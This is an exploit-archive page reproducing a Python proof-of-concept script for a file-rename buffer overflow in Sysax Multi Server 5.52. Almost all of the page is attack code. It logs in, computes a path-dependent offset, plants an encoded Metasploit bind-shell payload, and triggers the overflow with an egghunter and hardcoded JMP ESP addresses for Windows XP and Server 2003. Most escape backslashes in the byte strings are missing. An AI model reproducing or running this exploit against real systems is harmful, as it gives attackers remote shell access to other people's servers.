Home / exploits Sysax Multi Server 5.52 Buffer Overflow
Posted on 11 February 2012
#!/usr/bin/python ########################################################################################################## #Title: Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter) #Author: Craig Freyman (@cd1zz) #Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP) #Software Versions Tested: 5.50 and 5.52 #Date Discovered: Febrary 1, 2012 #Vendor Contacted: Febrary 3, 2012 #Vendor Response: (none) #A complete description of this exploit can be found here: #http://www.pwnag3.com/2012/02/sysax-multi-server-552-file-rename.html ########################################################################################################## import socket,sys,time,re,base64 if len(sys.argv) != 6: print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <XP or 2K3>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3] password = sys.argv[4] opersys = sys.argv[5] #base64 encode the provided creds creds = base64.encodestring(user+"x0a"+password) #msfpayload windows/shell_bind_tcp LPORT=4444 R|msfencode -e x86/alpha_mixed -b "x00x2fx0a" shell = ("DNWPDNWP" "x89xe3xdaxc5xd9x73xf4x5ax4ax4ax4ax4ax4ax4a" "x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59" "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" "x75x4ax49x39x6cx58x68x6dx59x55x50x65x50x45" "x50x55x30x4ex69x39x75x55x61x39x42x61x74x4c" "x4bx51x42x50x30x6ex6bx73x62x36x6cx6ex6bx63" "x62x57x64x6cx4bx53x42x55x78x66x6fx6dx67x73" "x7ax37x56x45x61x4bx4fx45x61x6fx30x4cx6cx65" "x6cx61x71x33x4cx75x52x64x6cx45x70x79x51x38" "x4fx66x6dx63x31x58x47x7ax42x68x70x73x62x71" "x47x6cx4bx33x62x32x30x4cx4bx77x32x55x6cx36" "x61x58x50x6ex6bx71x50x62x58x6ex65x4bx70x33" "x44x61x5ax77x71x68x50x72x70x4cx4bx33x78x36" "x78x6ex6bx70x58x71x30x57x71x59x43x79x73x75" "x6cx43x79x6ex6bx34x74x6cx4bx47x71x6ex36x55" "x61x49x6fx56x51x6fx30x4cx6cx49x51x68x4fx34" "x4dx33x31x49x57x64x78x69x70x30x75x38x74x75" "x53x53x4dx6bx48x37x4bx71x6dx51x34x52x55x6a" "x42x33x68x4ex6bx42x78x75x74x43x31x6ex33x62" "x46x6ex6bx66x6cx32x6bx4ex6bx76x38x47x6cx77" "x71x68x53x4ex6bx65x54x4cx4bx57x71x78x50x4f" "x79x67x34x51x34x51x34x63x6bx61x4bx65x31x30" "x59x30x5ax53x61x39x6fx6dx30x33x68x31x4fx52" "x7ax6cx4bx65x42x68x6bx4cx46x63x6dx55x38x44" "x73x46x52x63x30x33x30x35x38x42x57x30x73x50" "x32x73x6fx50x54x31x78x52x6cx34x37x44x66x44" "x47x59x6fx6ex35x6ex58x6ex70x77x71x55x50x55" "x50x46x49x49x54x46x34x42x70x61x78x51x39x6f" "x70x50x6bx53x30x59x6fx49x45x50x50x50x50x36" "x30x72x70x51x50x32x70x57x30x72x70x43x58x38" "x6ax34x4fx79x4fx6bx50x79x6fx39x45x6dx59x79" "x57x50x31x49x4bx51x43x65x38x43x32x45x50x72" "x31x73x6cx6cx49x49x76x32x4ax34x50x76x36x72" "x77x45x38x5ax62x4bx6bx55x67x63x57x79x6fx38" "x55x71x43x51x47x43x58x4fx47x59x79x64x78x69" "x6fx59x6fx7ax75x36x33x70x53x51x47x65x38x61" "x64x78x6cx67x4bx69x71x49x6fx48x55x70x57x6f" "x79x49x57x63x58x42x55x50x6ex72x6dx55x31x79" "x6fx39x45x33x58x63x53x72x4dx35x34x77x70x4e" "x69x79x73x76x37x73x67x62x77x46x51x7ax56x31" "x7ax57x62x76x39x46x36x4bx52x39x6dx42x46x38" "x47x62x64x61x34x47x4cx45x51x57x71x4cx4dx47" "x34x76x44x44x50x79x56x63x30x53x74x33x64x70" "x50x53x66x42x76x52x76x53x76x76x36x30x4ex71" "x46x32x76x36x33x62x76x53x58x44x39x48x4cx57" "x4fx6ex66x69x6fx79x45x6fx79x6dx30x30x4ex32" "x76x63x76x49x6fx56x50x42x48x65x58x6dx57x45" "x4dx31x70x79x6fx38x55x4dx6bx78x70x4dx65x69" "x32x30x56x50x68x4fx56x4ax35x4dx6dx6fx6dx49" "x6fx39x45x55x6cx66x66x43x4cx56x6ax4dx50x69" "x6bx59x70x64x35x74x45x6fx4bx53x77x55x43x43" "x42x42x4fx43x5ax55x50x52x73x79x6fx68x55x41" "x41") egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x44x4ex57x50x8bxfaxafx75xeaxafx75xe7xffxe7") print "============================================================================" print " Sysax Multi Server <= 5.52 File Rename BoF " print " by cd1zz " print " www.pwnag3.com " print " Launching exploit against " + target + " on port " + str(port) + " for " + opersys print "============================================================================" #login with encoded creds login = "POST /scgi?sid=0&pid=dologin HTTP/1.1 " login += "Host: " login += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 " login += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " login += "Accept-Language: en-us,en;q=0.5 " login += "Accept-Encoding: gzip, deflate " login += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 " login += "Proxy-Connection: keep-alive " login += "http://"+target+"/scgi?sid=0&pid=dologin " login += "Content-Type: application/x-www-form-urlencoded " login += "Content-Length: 15 " login += "fd="+creds #grab the sid r = socket.socket(socket.AF_INET,socket.SOCK_STREAM) r.connect((target, port)) print "[*] Getting your SID." r.send(login + " ") page = r.recv(10240) sid = re.search(r'sid=[a-zA-Z0-9]{40}',page,re.M) if sid is None: print "[X] Could not get a SID. User and pass correct?" sys.exit(1) print "[+] Your " + sid.group(0) time.sleep(2) #find the users path to calc offset print "[*] Finding home path to calculate offset." path = re.search(r'file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]',page,re.M) time.sleep(1) #if that doesnt work, try to upload a file and check again if path is None: print "[-] There are no files in your path so I'm going to try to upload one for you." print "[-] If you don't have rights to do this, it will fail." upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1 " upload += "Host: " upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620 " upload += "Content-Length: 219 " upload += "-----------------------------97336096252362005297691620 " upload += "Content-Disposition: form-data; name="upload_file"; filename="file.txt" " upload += "Content-Type: text/plain " upload += "-----------------------------97336096252362005297691620-- " u = socket.socket(socket.AF_INET,socket.SOCK_STREAM) u.connect((target, port)) u.send(upload + " ") page = u.recv(10240) path = re.search(r'file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]',page,re.M) time.sleep(2) if path is None: print "[X] It failed, you probably don't have rights to upload." print "[X] You will need to get your path another way to properly calculate the offset." sys.exit(1) print "[+] Got it ==> " + path.group(0) time.sleep(1) #subtract --> file=c: <--- (8 bytes) from the length and minus one more for the trailing --> pathlength = len(path.group(0)) - 8 - 1 #print "[*] The path is " + str(pathlength) + " bytes long (not including C:)." if pathlength < 16: print "[X] Your path is too short, this will just DoS the server." print "[X] The path has to be at least 16 bytes long or we cant jump to our buffer." sys.exit(1) time.sleep(2) r.close() #jump back 128 bytes jumpback = "xebx80" #No DEP bypass if opersys == "2K3": #2043 is the offset for c:A offset = 2044 - pathlength padding = "x90" * 10 junk = "x41" * (offset - len(egghunter+padding)) jump = "xa4xdex8ex7c" #JMP ESP buf = junk + egghunter + padding + jump + "x90"*12 + jumpback + "D"*10 if opersys == "XP": #2044 is the offset for c:A offset = 2044 - pathlength padding = "x90" * 10 junk = "x41" * (offset - len(egghunter+padding)) jump = "x53x93x42x7e" #JMP ESP buf = junk + egghunter + padding + jump + "x90"*12 + jumpback + "D"*10 #print "[*] Your offset is " + str(offset) #we'll stuff our shell in memory first stage1 = "POST /scgi?"+str(sid.group(0))+"&pid="+shell+"mk_folder2_name1.htm HTTP/1.1 " stage1 += "Host: " stage1 += "Referer: http://"+target+"/scgi?sid="+str(sid.group(0))+"&pid=mk_folder1_name1.htm " stage1 += "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231 " stage1 += "Content-Length: 171 " stage1 += "-----------------------------1190753071675116720811342231 " stage1 += "Content-Disposition: form-data; name="e2" " stage1 += "file_test " stage1 += "-----------------------------1190753071675116720811342231-- " #this is the bof stage2 = "POST /scgi?"+str(sid.group(0))+"&pid=rnmslctd1_name1.htm HTTP/1.1 " stage2 += "Host: " stage2 += "Referrer: http://"+target+"/scgi?sid=0&pid=dologin " stage2 += "Content-Type: multipart/form-data; boundary=---------------------------332173112583677792048824791 " stage2 += "Content-Length: 183 " stage2 += "-----------------------------332173112583677792048824791 " stage2 += "Content-Disposition: form-data; name="e2" " stage2 += "file_"+buf+" " stage2 += "-----------------------------332173112583677792048824791-- " s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target, port)) print "[*] Sending stage 1 shell." s.send(stage1 + " ") time.sleep(3) ##Dont close the socket or we'll lose our stage 1 shell in memory ##s.close() t = socket.socket(socket.AF_INET,socket.SOCK_STREAM) t.connect((target, port)) print "[*] Sending stage 2 BoF." t.send(stage2 + " ") print "[*] Go get your shell..." t.recv(2048)
